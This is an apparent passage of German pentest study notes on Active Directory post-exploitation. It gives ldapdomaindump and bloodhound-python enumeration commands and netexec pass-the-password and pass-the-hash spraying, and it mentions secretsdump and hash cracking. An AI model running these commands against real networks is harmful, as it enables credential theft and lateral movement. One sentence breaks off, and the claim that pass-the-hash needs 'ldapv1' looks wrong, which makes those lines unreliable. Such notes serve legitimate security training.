Dieser Schritt befasst sich damit, wie die Domain enumeriert werden kann, nachdem der Zugriff auf einen Account möglich ist. Dazu gibt es mehrere Möglichkeiten. Eine ist die folgende:

sudo ldapdomaindump ldaps://<IP des DC> -u '<Domain>\<user>' -p Password1

Um diesen Daten grafisch anzusehen gibt es ingestor dafür kann dann netexec oder

sudo bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -ns <DC> -c all

Pass the Password/Hash

Es ist möglich die gefundenen Credentials auf anderen Computern zu probieren. Dies ist beispielsweise mit netexec möglich:

nxc smb <IP Network> -u <USER> -p <Password>
nxc smb <IP Network> -u <User> -H <HASH> --local-auth

Auch ist es möglich Hashes zu bekommen meterpreter oder secretsdump. Es ist auch möglich die Hashes mit netexec zu bekommen und viele weitere Informationen. Für PtH wird allerdings ldapv1 benötigt. Es gibt auch ein Modul, welches für die Durchführung der Security Richtlinien zuständig ist es speichert auch Credentials.

[!notice] Info Zum cracken der Hashes wird nur der hintere Teil benötigt.